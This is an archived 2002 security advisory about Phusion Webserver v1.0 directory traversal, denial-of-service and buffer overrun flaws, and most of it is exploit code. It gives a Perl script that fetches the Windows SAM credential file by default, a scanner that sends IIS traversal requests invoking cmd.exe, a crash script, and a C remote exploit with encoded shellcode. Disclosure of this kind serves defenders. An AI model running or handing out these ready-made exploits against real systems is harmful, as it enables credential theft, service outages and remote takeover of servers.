Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: Servers :: web5111.htm

Phusion Webserver Directory Traversal, DoS Vulnerabilities



19th Feb 2002 [SBWID-5111]
COMMAND

	Phusion  Webserver  Directory   Traversal,   DoS   Vulnerabilities   and
	BufferOverrun

SYSTEMS AFFECTED

	Version: v1.0

PROBLEM

	Alex Hernandez found  that  Phusion  Webserver  for  Windows  9x/NT/2000
	contains 3 remote vulnerabilities which allow users to see and  retrieve
	any file on the server.
	

	Phusion  Webserver  Server  is  an  Webserver  for  Windows   9x/NT/2000
	(http://www.bbshareware.com/phusion/). A bug allows any user  to  change
	to any directory and see files to PATH  also  GET  files  remotely  also
	exist a BufferOverrun you can run abitrary code inside.
	

	 Directory traversal

	 ===================

	

	The security vulnerability is possible by using a specially crafted  URL
	composed of triple dot  \".../\"  directory  traversal  sequences,  with
	HTTP  encoded  character  representations  substituted  for  \"/\"   and
	\"\\\".
	

	Example:
	

	

	http://www.example.com/.../.../.../.../test.txt

	

	sh-2.04# nc -vvn 10.0.0.1 80

	(UNKNOWN) [10.0.0.1] 80 (?) open

	GET /.../.../.../.../test.txt HTTP /1.0

	

	

	

	 DoS

	 ===

	

	Server crashes after sending a very long URL:
	

	http://10.0.0.1/cgi-bin/AAAAAAAAA...(Ax2500)...AAA

	

	

	

	 Exploits Directory traversal, DoS, buffer overrun

	 =================================================

	

	

	------oOo------------------------

	Exploit Code GET files Phusion-GET.pl

	------oOo------------------------

	

	#!/usr/bin/perl

	#

	# THIS SCRIPT ONLY FOR WINDOWS WITH PERL OR CYGWIN 

	# 

	# Simple script to get files on server. 

	# 

	# Maybe u need this line for windows:

	# #! c:\\perl\\bin\\perl.exe

	#

	# Phusion Webserver v1.0 proof-of-concept exploit.

	# By Alex Hernandez <al3xhernandez@ureach.com> (C)2002.

	#

	# Thanks all the people from Spain and Argentina.

	# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins, 

	# G.Maggiotti & H.Oliveira.

	# 

	#

	# Usage: perl -x Phusion-GET.pl <And read the Intructions>

	#  

	#

	

	

	print(\"\\nPhusion Webserver v1.0 GET Files exploit (c)2002.\\n\");

	print(\"Alex Hernandez al3xhernandez\\@ureach.com\\n\\n\");

	

	

	print <<\"EOT\";

	Please type the address remote webserver, example: www.whitehouse.gov

	[Default remote Webserver is \"127.0.0.1\"`]:

	EOT

	$host = <>;

	

	print <<\"EOT\";

	Please type only in the directory where the file is located you want to

	download, 

	example: /winnt/repair/

	[default directory is \"/winnt/repair/\"] :#For IIS 4-5

	EOT

	$directory = <> || \"/winnt/repair/\";

	

	

	print <<\"EOT\";

	Please type in the filename you want download example: sam._ 

	[default file is \"sam._\"] :

	EOT

	$file = <> || \"sam._\";

	

	{

	#Maybe u to change this line depending of PATH installation.

	system(\"explorer.exe\", \"http://$host:80/../../..$directory$file\");

	}

	

	print <<\"EOT\";

	HAVE Fun!. ;-)  

	EOT

	

	

	

	------oOo------------------------

	Exploit Code Traversal Phusion_exp.pl

	------oOo------------------------

	

	#!/usr/bin/perl

	#

	# Simple script to identify if the host is vulnerable!, 

	# 

	# This does 15 different checks based IIS 4-5. Have Fun!

	#

	# Phusion Webserver v1.0 proof-of-concept exploit

	# By Alex Hernandez <al3xhernandez@ureach.com> (C)2002.

	#

	# Thanks all the people from Spain and Argentina.

	# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins, 

	# G.Maggiotti & H.Oliveira.

	# 

	#

	# Usage: perl -x Phusion_exp.pl <Hosts>:<Port>

	#

	# Example: 

	#

	# perl -x Phusion_exp.pl www.whitehouse.com:80

	# Trying.....................

	#

	# <THIS HOST IS VULNERABLE> :-)

	# Check the previous notes to execute bugs.

	#

	#

	

	use Socket;

	

	if ($#ARGV<0) {die \"

	\\nPhusion Webserver v1.0 traversal exploit(c)2002.

	Alex Hernandez al3xhernandez\\@ureach.com\\n

	

	Usage: perl -x $0 www.whitehouse.com:80 {OR}\\n

	[if the host is not using a proxy]\\n

	Usage: perl -x $0 127.0.0.1:80\\n\\n\";}

	

	($host,$port)=split(/:/,@ARGV[0]);

	print \"Trying.....................\\n\";

	$target = inet_aton($host);

	$flag=0;

	

	# ---------------test method 1

	my @results=sendraw(\"GET

	/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir 

	HTTP/1.0\\r\\n\\r\\n\");

	foreach $line (@results){

	 if ($line =~ /Directory/) {$flag=1;}}

	

	# ---------------test method 2

	my @results=sendraw(\"GET

	/scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir

	HTTP/1.0\\r\\n\\r\\n\");

	foreach $line (@results){

	 if ($line =~ /Directory/) {$flag=1;}}

	

	# ---------------test method 3

	my @results=sendraw(\"GET

	/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir 

	HTTP/1.0\\r\\n\\r\\n\");

	foreach $line (@results){

	 if ($line =~ /Directory/) {$flag=1;}}

	

	# ---------------test method 4

	my @results=sendraw(\"GET

	/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir 

	HTTP/1.0\\r\\n\\r\\n\");

	foreach $line (@results){

	 if ($line =~ /Directory/) {$flag=1;}}

	

	# ---------------test method 5

	my @results=sendraw(\"GET

	/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir 

	HTTP/1.0\\r\\n\\r\\n\");

	foreach $line (@results){

	 if ($line =~ /Directory/) {$flag=1;}}

	

	# ---------------test method 6

	my @results=sendraw(\"GET

	/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir 

	HTTP/1.0\\r\\n\\r\\n\");

	foreach $line (@results){

	 if ($line =~ /Directory/) {$flag=1;}}

	

	

	# ---------------test method 7

	my @results=sendraw(\"GET

	/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir 

	HTTP/1.0\\r\\n\\r\\n\");

	foreach $line (@results){

	 if ($line =~ /Directory/) {$flag=1;}}

	

	# ---------------test method 8

	my @results=sendraw(\"GET

	/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir 

	HTTP/1.0\\r\\n\\r\\n\");

	foreach $line (@results){

	 if ($line =~ /Directory/) {$flag=1;}}

	

	

	# ---------------test method 9

	my @results=sendraw(\"GET

	/scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir 

	HTTP/1.0\\r\\n\\r\\n\");

	foreach $line (@results){

	 if ($line =~ /Directory/) {$flag=1;}}

	

	# ---------------test method 10

	my @results=sendraw(\"GET

	/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir 

	HTTP/1.0\\r\\n\\r\\n\");

	foreach $line (@results){

	 if ($line =~ /Directory/) {$flag=1;}}

	

	# ---------------test method 11

	my @results=sendraw(\"GET

	/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir

	HTTP/1.0\\r\\n\\r\\n\");

	foreach $line (@results){

	 if ($line =~ /Directory/) {$flag=1;}}

	

	# ---------------test method 12

	my @results=sendraw(\"GET

	/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir

	HTTP/1.0\\r\\n\\r\\n\");

	foreach $line (@results){

	 if ($line =~ /Directory/) {$flag=1;}}

	

	# ---------------test method 13

	my @results=sendraw(\"GET

	/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir

	HTTP/1.0\\r\\n\\r\\n\");

	foreach $line (@results){

	 if ($line =~ /Directory/) {$flag=1;}}

	

	# ---------------test method 14

	my @results=sendraw(\"GET

	/msadc/..\\%e0\\%80\\%af../..\\%e0\\%80\\%af../..\\%e0\\%80\\%af../

	winnt/system32/cmd.exe\\?/c\\+dir

	HTTP/1.0\\r\\n\\r\\n\");

	foreach $line (@results){

	 if ($line =~ /Directory/) {$flag=1;}}

	

	# ---------------test method 15

	my @results=sendraw(\"GET

	/.../.../.../.../winnt/system32/cmd.exe\\?/c\\+dir

	HTTP/1.0\\r\\n\\r\\n\");

	foreach $line (@results){

	 if ($line =~ /Directory/) {$flag=1;}}

	

	#------------------------------

	if ($flag==1){print \"<THIS HOST IS VULNERABLE> :-)\\n

	Check the previous notes to execute bugs\\n\";}

	else {print \"<THIS HOST IS NOT VULNERABLE> :-( \\n

	Check manually on browser...\\n\";}

	

	

	sub sendraw {   

	        my ($pstr)=@_;

	        socket(S,PF_INET,SOCK_STREAM,getprotobyname(\'tcp\')||0) ||

	                die(\"Socket problems\\n\");

	        if(connect(S,pack \"SnA4x8\",2,$port,$target)){

	                my @in;

	                select(S);      $|=1;   print $pstr;

	                while(<S>){ push @in, $_;}

	                select(STDOUT); close(S); return @in;

	        } else { die(\"Can\'t connect check the port or address...\\n\"); }

	}

	

	

	

	------oOo-------------

	Exploit Code DoS Phusion_DoS.pl

	------oOo-------------

	

	#!/usr/bin/perl

	#

	# Simple script to send a long \'A^s\' command to the server, 

	# resulting in the server crashing.

	#

	# Phusion Webserver v1.0 proof-of-concept exploit.

	# By Alex Hernandez <al3xhernandez@ureach.com> (C)2002.

	#

	# Thanks all the people from Spain and Argentina.

	# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins, 

	# G.Maggiotti & H.Oliveira.

	# 

	#

	# Usage: perl -x Phusion_DoS.pl -s <server>

	#

	# Example: 

	#

	# perl -x Phusion_DoS.pl -s 10.0.0.1

	# 

	# Crash was successful !

	#

	

	use Getopt::Std;

	use IO::Socket;

	

	print(\"\\nPhusion Webserver v1.0 DoS exploit (c)2002.\\n\");

	print(\"Alex Hernandez al3xhernandez\\@ureach.com\\n\\n\");

	

	getopts(\'s:\', \\%args);

	if(!defined($args{s})){&usage;}

	

	($serv,$port,$def,$num,$data,$buf,$in_addr,$paddr,$proto);

	

	$def = \"A\";

	$num = \"3000\";

	$data .= $def x $num;

	$serv = $args{s};

	$port = 80;

	$buf = \"GET /cgi-bin/$data /HTTP/1.0\\r\\n\\r\\n\";

	

	

	$in_addr = (gethostbyname($serv))[4] || die(\"Error: $!\\n\");

	$paddr = sockaddr_in($port, $in_addr) || die (\"Error: $!\\n\");

	$proto = getprotobyname(\'tcp\') || die(\"Error: $!\\n\");

	

	socket(S, PF_INET, SOCK_STREAM, $proto) || die(\"Error: $!\");

	connect(S, $paddr) ||die (\"Error: $!\");

	select(S); $| = 1; select(STDOUT);

	print S \"$buf\";

	

	

	print(\"\\nCrash was successful !\\n\\n\");

	

	sub usage {die(\"\\n\\nUsage: perl -x $0 -s <server>\\n\\n\");}

	

	

	

	------oOo------------------------

	Exploit Code BufferOverrun Phusion-ovrun.c

	------oOo------------------------

	

	/** Phusion-Overun.c 

	** -Remote exploit for Phusion Webserver v1.0 for WinNT.

	**

	** Phusion Webserver v1.0 exploit gets remote servers\'s full control.

	** When you attacks a vulnerable server you can run abitrary code

	** inside.

	**

	** Phusion Webserver v1.0 proof-of-concept exploit.

	** By Alex Hernandez <al3xhernandez@ureach.com> (C)2002.

	**

	** Thanks all the people from Spain and Argentina.

	** Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins, 

	** G.Maggiotti & H.Oliveira.

	** 

	**

	** Compile: gcc -o Phusion-ovrun Phusion-ovrun.c

	**

	** Usage: ./Phusion-ovrun <hostname>

	**

	**

	** 

	**

	**/

	

	

	#include <stdio.h>

	#include <unistd.h>

	#include <sys/socket.h>

	#include <netinet/in.h>

	#include <sys/errno.h>

	#include <netdb.h>

	

	#define _PORT   80

	#define _X 10000

	

	char runcrash[] =

	\"GET /\"

	\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	\"\\x90\\x90\\x90\\x90\\x90\\x81\\xc7\\xc8\\x10\\x10\\x10\\x81\\xef\\x10\"

	\"\\x10\\x10\\x10\\x57\\x5e\\x33\\xc0\\x66\\xb8\\x31\\x02\\x90\\x90\\x50\"

	\"\\x59\\xac\\x34\\x99\\xaa\\xe2\\xfa\\x71\\x99\\x99\\x99\\x99\\xc4\\x18\"

	\"\\x74\\xb1\\x89\\xd9\\x99\\xf3\\x99\\xf1\\x19\\x99\\x99\\x99\\xf3\\x9b\"

	\"\\xf3\\x99\\xf3\\x99\\xf1\\x99\\x99\\x99\\xd9\\x14\\x2c\\xac\\x8b\\xd9\"

	\"\\x99\\xcf\\xf1\\x19\\x02\\xd4\\x99\\xc3\\x66\\x8b\\xc9\\xc2\\xf3\\x99\"

	\"\\x14\\x24\\x3a\\x89\\xd9\\x99\\xaa\\x59\\x32\\x14\\x2c\\x3a\\x89\\xd9\"

	\"\\x99\\xcf\\xf1\\xd3\\x98\\x99\\x99\\x09\\x14\\x2c\\x72\\x89\\xd9\\x99\"

	\"\\xcf\\xca\\xf1\\x49\\x05\\xd4\\x99\\xc3\\x66\\x8b\\xca\\xf1\\x05\\x02\"

	\"\\xd4\\x99\\xc3\\x66\\x8b\\xf1\\xa9\\xd4\\xde\\x99\\xc6\\x14\\x2c\\x3e\"

	\"\\x89\\xd9\\x99\\xf3\\xdd\\x09\\x09\\x09\\x09\\xc0\\x35\\x33\\x7b\\x65\"

	\"\\xf3\\x99\\x23\\x31\\x02\\xd4\\x99\\x66\\x8b\\x99\\x99\\x99\\x99\\xca\"

	\"\\xfc\\xeb\\xef\\xfc\\xeb\\xb9\\xf1\\xf8\\xfa\\xf2\\xfc\\xfd\\xb7\\xa5\"

	\"\\xb6\\xf1\\xab\\xa7\\xf1\\xed\\xed\\xe9\\xa3\\xb6\\xb6\\xee\\xee\\xee\"

	\"\\xb7\\xfd\\xfc\\xfc\\xe9\\xe3\\xf6\\xf7\\xfc\\xb7\\xf6\\xeb\\xfe\\xb9\"

	\"\\xb9\\xca\\xe9\\xf5\\xf6\\xf0\\xed\\xb9\\xfa\\xf6\\xfd\\xfc\\xfd\\xb9\"

	\"\\xfb\\xe0\\xb9\\xe5\\xc3\\xf8\\xf7\\xb9\\xe4\\xa3\\xb0\\xa5\\xf1\\xed\"

	\"\\xf4\\xf5\\xa7\\xa5\\xf1\\xfc\\xf8\\xfd\\xa7\\xa5\\xed\\xf0\\xed\\xf5\"

	\"\\xfc\\xa7\\xca\\xfc\\xeb\\xef\\xfc\\xeb\\xb9\\xf1\\xf8\\xfa\\xf2\\xfc\"

	\"\\xfd\\xb7\\xa5\\xb6\\xed\\xf0\\xed\\xf5\\xfc\\xa7\\xa5\\xb6\\xf1\\xfc\"

	\"\\xf8\\xfd\\xa7\\xa5\\xfb\\xf6\\xfd\\xe0\\xa7\\xa5\\xfa\\xfc\\xf7\\xed\"

	\"\\xfc\\xeb\\xa7\\xd1\\xfc\\xf5\\xf5\\xf6\\xb7\\xb9\\xc0\\xf6\\xec\\xb9\"

	\"\\xf8\\xeb\\xfc\\xb9\\xeb\\xec\\xf7\\xf7\\xf0\\xf7\\xfe\\xb9\\xf8\\xb9\"

	\"\\xc3\\xdb\\xca\\xfc\\xeb\\xef\\xfc\\xeb\\xb9\\xc9\\xcb\\xd6\\xea\\xb9\"

	\"\\xfb\\xec\\xfe\\xfe\\xe0\\xb9\\xef\\xfc\\xeb\\xea\\xf0\\xf6\\xf7\\xb9\"

	\"\\xf8\\xf7\\xfd\\xb9\\xe0\\xf6\\xec\\xb9\\xf1\\xf8\\xef\\xfc\\xb9\\xfb\"

	\"\\xfc\\xfc\\xf7\\xb9\\xf8\\xfb\\xec\\xea\\xfc\\xfd\\xb7\\xa5\\xe9\\xa7\"

	\"\\xd4\\xf6\\xeb\\xfc\\xb9\\xf0\\xf7\\xff\\xf6\\xeb\\xf4\\xf8\\xed\\xf0\"

	\"\\xf6\\xf7\\xb9\\xfa\\xf8\\xf7\\xb9\\xfb\\xfc\\xb9\\xfd\\xf6\\xee\\xf7\"

	\"\\xf5\\xf6\\xf8\\xfd\\xb9\\xff\\xeb\\xf6\\xf4\\xb9\\xf1\\xed\\xed\\xe9\"

	\"\\xa3\\xb6\\xb6\\xee\\xee\\xee\\xb7\\xfd\\xfc\\xfc\\xe9\\xe3\\xf6\\xf7\"

	\"\\xfc\\xb7\\xf6\\xeb\\xfe\\xb9\\xf6\\xeb\\xb9\\xf1\\xed\\xed\\xe9\\xa3\"

	\"\\xb6\\xb6\\xf4\\xf8\\xeb\\xfc\\xf8\\xea\\xef\\xf0\\xef\\xf8\\xea\\xb7\"

	\"\\xfa\\xf3\\xfb\\xb7\\xf7\\xfc\\xed\\xa5\\xe9\\xa7\\xeb\\xfc\\xfe\\xf8\"

	\"\\xeb\\xfd\\xea\\xb9\\xed\\xf6\\xb9\\xdd\\xfc\\xfc\\xe9\\xc3\\xf6\\xf7\"

	\"\\xfc\\xb9\\xfa\\xeb\\xfc\\xee\\xb9\\xb1\\xcd\\xf1\\xfc\\xce\\xf0\\xe3\"

	\"\\xf8\\xeb\\xfd\\xb5\\xb9\\xd8\\xf7\\xec\\xea\\xf2\\xf8\\xb9\\xf8\\xf7\"

	\"\\xfd\\xb9\\xd7\\xfc\\xf4\\xf6\\xb0\\xa5\\xe9\\xa7\\xda\\xf6\\xfd\\xfc\"

	\"\\xfd\\xb9\\xfb\\xe0\\xb9\\xe5\\xc3\\xf8\\xf7\\xb7\\xa5\\xb6\\xfa\\xfc\"

	\"\\xf7\\xed\\xfc\\xeb\\xa7\\xa5\\xb6\\xfb\\xf6\\xfd\\xe0\\xa7\\xa5\\xb6\"

	\"\\xf1\\xed\\xf4\\xf5\\xa7\\xb7\\xc5\\xf1\\xed\\xf4\\xf5\\xc5\\xca\\xfc\"

	\"\\xeb\\xef\\xfc\\xeb\\xd8\\xfb\\xec\\xea\\xfc\\xfd\\xfb\\xe0\\xf0\\xc3\"

	\"\\xf8\\xf7\\xb7\\xf1\\xed\\xf4\\xf5\\x99\\x90\\x90\\x90\\x90\\x90\\x90\"

	\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	\"\\x90\\x90\\x90\\x90\\x90\\xac\\xe0\\xe3\\x01\";

	

	

	int     sock;

	struct  sockaddr_in sock_a;

	struct  hostent *host;

	

	int main (int argc, char *argv[]) {

	

	printf(\"\\nWinNT 4.0 sp5 Phusion Webserver v1.0 BufferOverrun exploit\\n\");

	printf(\"Alex Hernandez al3xhernandez@ureach.com\\n\\n\");

	

	if(argc < 2) {

	   fprintf(stderr, \"Error : Usage: %s <hostname> \\n\", argv[0]);

	   exit(0);

	  }

	

	

	if((host=(struct hostent *)gethostbyname(argv[1])) == NULL) {

	    perror(\"gethostbyname\");

	    exit(-1);

	  }

	

	if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {

	    perror(\"create socket\");

	    exit(-1);

	  }

	

	sock_a.sin_family=AF_INET;

	sock_a.sin_port=htons(_PORT);

	memcpy((char *)&sock_a.sin_addr,(char *)host->h_addr,host->h_length);

	if(connect(sock,(struct sockaddr *)&sock_a,sizeof(sock_a))!=0) {

	    perror(\"create connect\");

	    exit(-1);

	  }

	

	  fflush(stdout);

	

	  write(sock,runcrash,_X);

	  write(sock,\"\\n\\n\", 2);

	  printf(\"done.\\n\\n\");

	

	}

	

SOLUTION

	Nothing yet.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH